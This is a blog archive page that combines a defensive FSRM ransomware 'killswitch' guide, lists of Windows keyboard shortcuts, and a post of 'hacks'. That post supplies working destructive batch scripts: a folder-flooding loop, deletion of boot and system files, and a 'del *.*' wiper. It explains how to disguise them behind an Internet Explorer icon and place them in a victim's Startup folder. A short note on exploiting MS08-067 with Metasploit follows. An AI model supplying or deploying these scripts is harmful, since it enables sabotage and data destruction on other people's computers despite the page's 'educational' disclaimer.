Archive for the ‘Windows Server’ Category

Many companies spend a fortune on Next Generation anti-virus and Machine Learning “AI” tools to halt the spread of ransomware and although I strongly believe that user education and training plays a key part in this Windows does can help in a massive way. Windows File Services Resource Manager (FSRM) a resource already built into Windows can halt the spread and quarantine accounts that are affected.

This solution utilises PowerShell and Windows File Services Resource Manager to automatically lockout a user account when ransomware activities are detected.

Installing FSRM
First and foremost, you will need to set up FSRM on your file servers. This feature is part of the File Services Role and can be installed with the following PowerShell command (all one line).

Install-WindowsFeature –Name FS-Resource-Manager
–IncludeManagementTool

Take note, FSRM is only available on Windows Server. If you’re interested in workstation mitigation, comment below and I’ll get to writing!

Get Email Alerts
In order to be emailed of the action our killswitch takes, we will need to set up the SMTP Server settings within FSRM. We don’t necessarily have to do this right now, but it saves us from seeing annoying prompts in the future steps.

Open up Server Manager > File and Storage Services > Right-click on your server > File Server Resource Manager (this can also be accessed through Administrative Tools). Once opened, right-click “File Server Resource Manager (Local)” in the left pane and select “Configure Options…” Go ahead and set up all your email settings, similar to below.

Set up Killswitch Directory
In your corporate file share(s), set up a directory that begins with an underscore. If the ransomware is encrypting alphabetically, this will ensure that it is tripped as soon as possible. Within that directory, we will place a text file called killswitch.txt.

Set Up the Killswitch
Many variants of ransomware look to find mapped drives and will begin encrypting data in alphabetical order. Because of this, our killswitch is going to be a directory placed in the file shares that begins with an underscore.

Create a new File Group under File Screening Management that will look at all files except our killswitch.txt.

Next, we will create a File Screen Template utilizing the File Group we created called “All File Types”.

We will want to configure email alerts, so on the E-Mail Message tab, fill out the pertinent information.

We also want to automate the removal of the offending user in order to stop the ransomware from encrypting our entire file server. We will do this with some PowerShell. Copy the following and save it to your preferred location. In this example, I’m just saving it to C:\kickuser.ps1.

param( [string]$username = “” ) Get-SmbShare -Special $false | ForEach-Object { Block-SmbShareAccess -Name $_.Name -AccountName “$username” -Force }

On the Command-Tab, check “Run this command or script:” and the following:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

For the command arguments, insert the following:

-Command “& {C:\smbblock.ps1 -username ‘[Source Io Owner]’}”

Set it to run as Local System.

Apply the File Screen
From within FSRM, Select File Screening Management > File Screens and create a new File Screen. Set the path to your underscore directory and use the “Detect Ransomware” File Screen template that we created earlier.

kill_1

Testing
To test, I created a test account (test guy) and modified the file. I was instantly locked out of the share. The output of our PowerShell script, as well as the share permissions, show this:

testing 567

perm2

Wrapping Up
This methodology should help mitigate some risk around ransomware attacks. In the future, it may also be beneficial to make the following changes:

  1. Create a secondary killswitch in a ZZZ_Killswitch directory in case a ransomware-variant starts in reverse-alphabetical order.

I believe in using the resources we already have available to us in helping secure our organisations, and hopefully, this helps. Feel free to comment with any questions or suggestions.

 

tv-300x2241

Download the PDF cheat sheet >Caintech.co.uk Windows Shortcuts You Should All Know To Save Time

 

Windows Explorer Keyboard Shortcuts

* END (Display the bottom of the active window)

* HOME (Display the top of the active window)

* NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)

* NUM LOCK+Plus sign (+) (Display the contents of the selected folder)

* NUM LOCK+Minus sign (-) (Collapse the selected folder)

* LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)

* RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)

 

Shortcut Keys for Character Map

* After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:

* RIGHT ARROW (Move to the right or to the beginning of the next line)

* LEFT ARROW (Move to the left or to the end of the previous line)

* UP ARROW (Move up one row)

* DOWN ARROW (Move down one row)

* PAGE UP (Move up one screen at a time)

* PAGE DOWN (Move down one screen at a time)

* HOME (Move to the beginning of the line)

* END (Move to the end of the line)

* CTRL+HOME (Move to the first character)

* CTRL+END (Move to the last character)

* SPACEBAR (Switch between Enlarged and Nor mal mode when a character is selected)

 

Microsoft Management Console (MMC) Main Window Keyboard Shortcuts

* CTRL+O (Open a saved console)

* CTRL+N (Open a new console)

* CTRL+S (Save the open console)

* CTRL+M (Add or remove a console item)

* CTRL+W (Open a new window)

* F5 key (Update the content of all console windows)

* ALT+SPACEBAR (Display the MMC window menu)

* ALT+F4 (Close the console)

* ALT+A (Display the Action menu)

* ALT+V (Display the View menu)

* ALT+F (Display the File menu)

* ALT+O (Display the Favourites menu)

 

MMC Console Window Keyboard Shortcuts

* CTRL+P (Print the current page or active pane)

* ALT+Minus sign (-) (Display the window menu for the active console window)

* SHIFT+F10 (Display the Action shortcut menu for the selected item)

* F1 key (Open the Help topic, if any, for the selected item)

* F5 key (Update the content of all console windows)

* CTRL+F10 (Maximize the active console window)

* CTRL+F5 (Restore the active console window)

* ALT+ENTER (Display the Properties dialog box, if any, for the selected item)

* F2 key (Rename the selected item)

* CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)

 

Remote Desktop Connection Navigation

* CTRL+ALT+END (Open the Microsoft Windows NT Security dialog box)

* ALT+PAGE UP (Switch between programs from left to right)

* ALT+PAGE DOWN (Switch between programs from right to left)

* ALT+INSERT (Cycle through the programs in most recently used order)

* ALT+HOME (Display the Start menu)

* CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)

* ALT+DELETE (Display the Windows menu)

* CTRL+ALT+Minus sign (-) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)

* CTRL+ALT+Plus sign (+) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)

 

Internet Explorer navigation

* CTRL+B (Open the Organize Favourites dialog box)

* CTRL+E (Open the Search bar)

* CTRL+F (Start the Find utility)

* CTRL+H (Open the History bar)

* CTRL+I (Open the Favourites bar)

* CTRL+L (Open the Open dialog box)

* CTRL+N (Start another instance of the browser with the same Web address)

* CTRL+O (Open the Open dialog box, the same as CTRL+L)

* CTRL+P (Open the Print dialog box)

* CTRL+R (Update the current Web page)

* CTRL+W (Close the current window)

tv crime2

Now as you read this post you may think to yourself that you would like to try these scripts, well I will warn you again ‘Never Try These Hacks On Your Computer’. The safest way to try these is in a virtual machine, I recommend VMware player or VirtualBox, both are free for personal use.

We will be creating some batch files so you will need to ‘Show hidden files, folders and drives’ also untick the box ‘Hide extensions for known file types’

To do this type ‘folder options’ into the windows search bar  and you’ll be presented with the following dialog box.

folder options

 

 1) Crash A Computer With A Simple Link

This is a simple java script called “exploit”. This script can hang or crash your computer. This script just floods you up with the infinite number mailto:xxx windows. To prevent this you need to end the process of script before it runs out of your RAM. This can only be done by rebooting your computer before it fully utilizes your RAM.

WARNING THIS LINK WILL CRASH YOUR BROWSER OR WORSE, YOUR COMPUTER !!!!

 Click Here. (http://tiny.cc/ibJUN)

 2) Make Countless Number Of Folders With A Single Click

A simple 3 line code can be very dangerous and also quite funny. So paste the below code in notepad and save it as IE.bat

@echo off

:top

md %random%

goto top

@echo off > this command makes your screen appears blank but actually making the countless number of folders in the background

Md %random% > md %random% is a command for creating folders with random names. ( md is a command in dos for making directories)

Goto top > goto top is a command for to send the control to :top causing an infinite loop.

To make this more enticing drop the batch file on the C drive and create a shortcut on the desktop. Now right click on the shortcut and select ‘Properties’

Now select ‘Change Icon’ and browse to C:\Program Files\Internet Explorer\iexplore.exe

This has now given you an Internet Explorer icon that will execute the malicious batch file, delete the original IE icon from the desktop.

 

3) Shut Down Your PC For Ever

This is the most malicious hack, this will delete ALL system files and will stop the victims PC from booting.

To perform this copy the below text to a text file and save it as ‘Shutdown.bat’

You can always do the same as the above hack and copy it to the victims PC and send a shortcut to the desktop.

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

DON’T RUN THE BATCH FILE, YOU WONT BE ABLE TO RECOVER AFTER YOU RUN IT!!!

 4) RAM Crashing Trick.

Open notepad and type the following codes

:A

Start http://www.facebook.com

Goto A

save the file as facebook.bat

 This code will infinitely loop the browser to open http://www.facebook.com

5) Delete ALL System Files With Just 6 Character Command

Copy the following command in your notepad and save it as facebook.bat

Del *.*

So when the victim runs this file all the data will be deleted.

If you have access to the victims PC you can drop any of these batch files in a folder called ‘Start up’ this will then run when the user restarts their machine.

C:\Users\VICTIMS NAME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

These are for educational purposes only, please do not use this information for malicious purposes. Caintech.co.uk take no responsibility for the actions of any individuals however feedback would be most appreciated.

 

tv-backtrackThis tutorial is for demonstration purposes only – Please use this knowledge responsibly

This video will show you how to create a reverse SSH connection to a server/workstation

This exploit is taking advantage of vulnerability MS08-067 using Metasploit on Kali.
This is a Kali VM attacking a Microsoft 2008 server (this will also work on any machine without the patch)

The moral of this is to update your system

http://www.kali.org

http://support.microsoft.com/kb/958644

Caintech.co.uk – Here comes Kali

Affected Software

Operating System

Microsoft Windows 2000 Service Pack 4

Windows XP Service Pack 2

Windows XP Service Pack 3

Windows XP Professional x64 Edition

Windows XP Professional x64 Edition Service Pack 2

Windows Server 2003 Service Pack 1

Windows Server 2003 Service Pack 2

Windows Server 2003 x64 Edition

Windows Server 2003 x64 Edition Service Pack 2

Windows Server 2003 with SP1 for Itanium-based Systems

Windows Server 2003 with SP2 for Itanium-based Systems

Windows Vista and Windows Vista Service Pack 1

Windows Vista x64 Edition and Windows Vista x64 Edition Service Pack 1

Windows Server 2008 for 32-bit Systems

Windows Server 2008 for x64-based Systems

Windows Server 2008 for Itanium-based Systems